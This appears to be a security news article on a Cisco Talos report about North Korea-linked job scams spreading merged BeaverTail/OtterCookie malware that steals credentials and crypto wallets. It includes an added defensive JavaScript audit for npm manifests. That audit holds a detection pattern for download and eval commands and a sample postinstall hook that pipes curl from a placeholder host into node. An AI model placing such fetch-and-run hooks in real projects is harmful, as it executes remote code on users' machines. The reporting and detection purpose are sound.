A recent report from Cisco Talos reveals that the North Korea-linked hacking group Famous Chollima is leveraging the job market to conduct cyberattacks. The group is utilizing fraudulent job postings to ensnare victims into downloading malicious software that enables the theft of cryptocurrency and user credentials.
Merging Malware Threats
Two malware families, known as BeaverTail and OtterCookie, have been identified as combining their functionalities, indicating a strategic shift by the attackers to bolster their capabilities for future operations. Cisco Talos observed this campaign after a system breach at an organization based in Sri Lanka. The attack chain starts when an unsuspecting individual installs a trojanized application, such as Chessfi, inadvertently executing a command that downloads a concealed malicious package named “node-nvm-ssh.”
This particular package executes a sophisticated set of instructions that culminate in the deployment of a disguised file containing the merged code from BeaverTail and OtterCookie.
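The install-time chain described above (a trojanized app whose install step pulls in a hidden package) is the kind of thing a defender can check for in an npm manifest. The following is an added example, not code from Talos or Hackread: it audits a package.json for the package name the report cites (“node-nvm-ssh”) and for install hooks that fetch or evaluate remote code. The sample manifest is constructed; the assumption that the dropper rides an npm lifecycle script is mine.

```javascript
// Added example (not from the Talos report): audit an npm package.json for
// (a) a dependency on the package the report names, "node-nvm-ssh", and
// (b) install-time lifecycle hooks that download or eval remote code.
// Treating "node-nvm-ssh" as an npm dependency is an assumption, not a
// detail stated in the article.

const KNOWN_BAD_PACKAGES = new Set(["node-nvm-ssh"]); // name from the report

// Hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Commands in an install hook that fetch or execute remote content.
const SUSPICIOUS_CMD = /\b(curl|wget|node\s+-e|eval\(|Invoke-WebRequest|powershell)\b/i;

// Returns a list of findings; an empty list means nothing flagged.
function auditManifest(manifest) {
  const findings = [];
  const deps = Object.assign(
    {},
    manifest.dependencies,
    manifest.devDependencies,
    manifest.optionalDependencies,
  );
  for (const name of Object.keys(deps)) {
    if (KNOWN_BAD_PACKAGES.has(name)) {
      findings.push({ kind: "known-bad-dependency", detail: name });
    }
  }
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (cmd && SUSPICIOUS_CMD.test(cmd)) {
      findings.push({ kind: "suspicious-install-hook", detail: `${hook}: ${cmd}` });
    }
  }
  return findings;
}

// CONSTRUCTED manifest of a hypothetical trojanized app, modelled on the
// report's description; the hostname is a placeholder.
const SAMPLE_MANIFEST = {
  name: "chessfi-app",
  version: "1.0.0",
  scripts: {
    postinstall: "curl -s https://example.invalid/pkg.js | node",
    start: "node index.js",
  },
  dependencies: { express: "^4.18.0", "node-nvm-ssh": "1.0.0" },
};
```

Run `auditManifest(require("./package.json"))` against a real project to get the same two kinds of findings; a clean manifest returns an empty array.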
Evolution of Malware Capabilities
An evolution in the capabilities of the malware has been noted, illustrating a marked increase in its data theft potential. The earlier versions of the malware, cataloged from September to November 2024 (V1), primarily targeted browser profiles. By November 2024 to February 2025 (V2), additional functionality allowed for clipboard content theft, while V3 (February to April 2025) expanded its reach to specific files across all mounted disk drives.
The most alarming development has occurred with the latest OtterCookie version, V5, observed between April and August 2025. This iteration introduces advanced features, including a keylogging module that records every keystroke and a screenshot feature that captures the user’s desktop every four seconds. The gathered keystrokes and images are subsequently uploaded to the attackers’ command and control server.
Targeting Financial Data and Advanced Evasion Techniques
The primary aim of this campaign is the theft of financial data, with particular emphasis on widely used cryptocurrency browser extensions and wallets. OtterCookie specifically targets wallets such as MetaMask, Trust Wallet, and Binance Chain Wallet, among others.
Moreover, researchers have observed that the attackers are incorporating essential functions directly into the malware’s core JavaScript code, diminishing the need for supplementary languages such as Python. This adaptation makes the malware more versatile and simplifies deployment, particularly for attacks on browsers such as Google Chrome and Brave that aim to steal data from cryptocurrency extensions.
This research has been disseminated through Hackread.com, underscoring that North Korea’s cyber strategy is heavily reliant on job-based scams. Previous reports from cybersecurity firms such as Silent Push, also covered by Hackread.com, indicated that the Lazarus Group has similarly targeted cryptocurrency job seekers using fake companies, such as BlockNovas LLC. Alarmingly, the same BeaverTail and OtterCookie malware found in those prior incidents has now evolved for more sophisticated operations.